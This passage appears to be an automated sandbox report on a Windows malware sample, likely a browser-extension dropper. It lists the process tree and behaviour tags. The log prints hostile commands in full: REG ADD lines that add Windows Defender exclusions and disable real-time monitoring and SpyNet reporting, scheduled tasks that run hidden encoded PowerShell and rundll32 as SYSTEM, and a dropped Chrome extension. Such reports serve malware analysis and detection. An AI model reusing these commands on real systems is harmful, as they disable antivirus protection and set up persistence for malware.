39 PID 2320 wrote to memory of 2252 2320 cmd.exe 39 PID 2320 wrote to memory of 2252 2320 cmd.exe 39 PID 2320 wrote to memory of 2252 2320 cmd.exe 39 PID 2320 wrote to memory of 2252 2320 cmd.exe 39 PID 2320 wrote to memory of 2252 2320 cmd.exe 39 PID 2028 wrote to memory of 2416 2028 cmd.exe 40
Processes
-
C:\Users\Admin\AppData\Local\Temp\96549bc3b25487075ad20e2575e6d55c47cb917dec7bf93ee69f6ba770855f73.exe"C:\Users\Admin\AppData\Local\Temp\96549bc3b25487075ad20e2575e6d55c47cb917dec7bf93ee69f6ba770855f73.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2948 -
C:\Users\Admin\AppData\Local\Temp\7zS1804.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3032 -
C:\Users\Admin\AppData\Local\Temp\7zS1C48.tmp\Install.exe.\Install.exe /KZdidRImYk "385118" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2088 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2320 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:1684
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:2252
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2408 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2028 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:972
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:2416
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "galTySMwE" /SC once /ST 16:01:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:2548
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "galTySMwE"4⤵PID:2140
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "galTySMwE"4⤵PID:2768
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bxxbXoYHkHGjuhIljt" /SC once /ST 22:29:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\WckEBxbmAYthbbDXY\wIIEWDrPxRHmHof\QUAtrBc.exe\" 9N /Qssite_idcLS 385118 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2632
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {C0979E19-BC7C-436E-96A7-3DFD700334FC} S-1-5-21-1305762978-1813183296-1799492538-1000:CQOQSKLT\Admin:Interactive:[1]1⤵PID:288
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1648 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2696
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2836 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2440
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1632 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1388
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1676 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:984
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2476
-
C:\Windows\system32\taskeng.exetaskeng.exe {085F199F-9EF5-42C7-B9FD-57CD7D0BCB20} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:2532
-
C:\Users\Admin\AppData\Local\Temp\WckEBxbmAYthbbDXY\wIIEWDrPxRHmHof\QUAtrBc.exeC:\Users\Admin\AppData\Local\Temp\WckEBxbmAYthbbDXY\wIIEWDrPxRHmHof\QUAtrBc.exe 9N /Qssite_idcLS 385118 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:2968 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gZbSdtqcv" /SC once /ST 17:03:52 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2148
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gZbSdtqcv"3⤵PID:560
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gZbSdtqcv"3⤵PID:1156
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1732
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:2092
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1936
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1084
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gFHYvzHBt" /SC once /ST 12:50:09 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2128
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gFHYvzHBt"3⤵PID:2508
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gFHYvzHBt"3⤵PID:2012
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\tSkdRfYqneaszoCN" /t REG_DWORD /d 0 /reg:323⤵PID:2368
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\tSkdRfYqneaszoCN" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2404
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\tSkdRfYqneaszoCN" /t REG_DWORD /d 0 /reg:643⤵PID:2060
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\tSkdRfYqneaszoCN" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2184
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\tSkdRfYqneaszoCN" /t REG_DWORD /d 0 /reg:323⤵PID:3024
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\tSkdRfYqneaszoCN" /t REG_DWORD /d 0 /reg:324⤵PID:1592
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\tSkdRfYqneaszoCN" /t REG_DWORD /d 0 /reg:643⤵PID:1680
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\tSkdRfYqneaszoCN" /t REG_DWORD /d 0 /reg:644⤵PID:2244
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\tSkdRfYqneaszoCN\yEcHoKpe\QakoxGXzsQEIIRuq.wsf"3⤵PID:1108
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\tSkdRfYqneaszoCN\yEcHoKpe\QakoxGXzsQEIIRuq.wsf"3⤵
- Modifies data under HKEY_USERS
PID:2908 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DaigJzLtIdVhYyWmoPR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2304
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DaigJzLtIdVhYyWmoPR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2400
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FfbRhZLOhCYvC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1684
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FfbRhZLOhCYvC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2352
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HfPaSUeHU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2108
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HfPaSUeHU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1916
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cLiUTEHkTdUU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1840
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cLiUTEHkTdUU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kHJwzzblBfUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2560
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kHJwzzblBfUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2576
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\EJLOJmqcxNMyUMVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2668
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\EJLOJmqcxNMyUMVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2700
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2664
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2428
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\WckEBxbmAYthbbDXY" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2752
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\WckEBxbmAYthbbDXY" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2640
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\tSkdRfYqneaszoCN" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2636
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\tSkdRfYqneaszoCN" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:700
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DaigJzLtIdVhYyWmoPR" /t REG_DWORD /d 0 /reg:324⤵PID:2732
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DaigJzLtIdVhYyWmoPR" /t REG_DWORD /d 0 /reg:644⤵PID:2180
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FfbRhZLOhCYvC" /t REG_DWORD /d 0 /reg:324⤵PID:2452
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FfbRhZLOhCYvC" /t REG_DWORD /d 0 /reg:644⤵PID:2828
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HfPaSUeHU" /t REG_DWORD /d 0 /reg:324⤵PID:900
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HfPaSUeHU" /t REG_DWORD /d 0 /reg:644⤵PID:592
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cLiUTEHkTdUU2" /t REG_DWORD /d 0 /reg:324⤵PID:2004
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cLiUTEHkTdUU2" /t REG_DWORD /d 0 /reg:644⤵PID:2812
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kHJwzzblBfUn" /t REG_DWORD /d 0 /reg:324⤵PID:1200
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kHJwzzblBfUn" /t REG_DWORD /d 0 /reg:644⤵PID:2220
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\EJLOJmqcxNMyUMVB" /t REG_DWORD /d 0 /reg:324⤵PID:2800
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\EJLOJmqcxNMyUMVB" /t REG_DWORD /d 0 /reg:644⤵PID:1052
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:2848
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\WckEBxbmAYthbbDXY" /t REG_DWORD /d 0 /reg:324⤵PID:2092
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\WckEBxbmAYthbbDXY" /t REG_DWORD /d 0 /reg:644⤵PID:2084
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\tSkdRfYqneaszoCN" /t REG_DWORD /d 0 /reg:324⤵PID:2324
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\tSkdRfYqneaszoCN" /t REG_DWORD /d 0 /reg:644⤵PID:2960
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gVrKEdDwu" /SC once /ST 18:43:21 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1256
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gVrKEdDwu"3⤵PID:2424
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gVrKEdDwu"3⤵PID:2060
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:2228
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:2980
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:1764
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:1044
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "RdLmjNtWjKxsLsIur" /SC once /ST 15:03:26 /RU "SYSTEM" /TR "\"C:\Windows\Temp\tSkdRfYqneaszoCN\xBHSCvKJuRjHyLI\XAYAsAQ.exe\" N7 /UMsite_idxOh 385118 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:436
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "RdLmjNtWjKxsLsIur"3⤵PID:1848
-
-
-
C:\Windows\Temp\tSkdRfYqneaszoCN\xBHSCvKJuRjHyLI\XAYAsAQ.exeC:\Windows\Temp\tSkdRfYqneaszoCN\xBHSCvKJuRjHyLI\XAYAsAQ.exe N7 /UMsite_idxOh 385118 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1512 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bxxbXoYHkHGjuhIljt"3⤵PID:2232
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:2240
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:1804
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:2884
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:3052
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\HfPaSUeHU\SjjnrZ.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "UYMKlLeeRMLoSzo" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2596
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "UYMKlLeeRMLoSzo2" /F /xml "C:\Program Files (x86)\HfPaSUeHU\rUEEnzt.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2908
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "UYMKlLeeRMLoSzo"3⤵PID:2960
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "UYMKlLeeRMLoSzo"3⤵PID:2160
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KpQcdoEdJOOpFe" /F /xml "C:\Program Files (x86)\cLiUTEHkTdUU2\PoUpzHw.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2152
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "EbglqitPhrSYU2" /F /xml "C:\ProgramData\EJLOJmqcxNMyUMVB\QPkwSLF.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1328
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "eaBLryDdLfUVBQJku2" /F /xml "C:\Program Files (x86)\DaigJzLtIdVhYyWmoPR\gTwdEQi.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1380
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "puVwMMxWFAAtMJhcECe2" /F /xml "C:\Program Files (x86)\FfbRhZLOhCYvC\luZgCWt.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1504
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "UHTTgbauCkoiRQjtd" /SC once /ST 20:23:45 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\tSkdRfYqneaszoCN\ULItknQf\JvWNTFL.dll\",#1 /Gbsite_idrqH 385118" /V1 /F3⤵
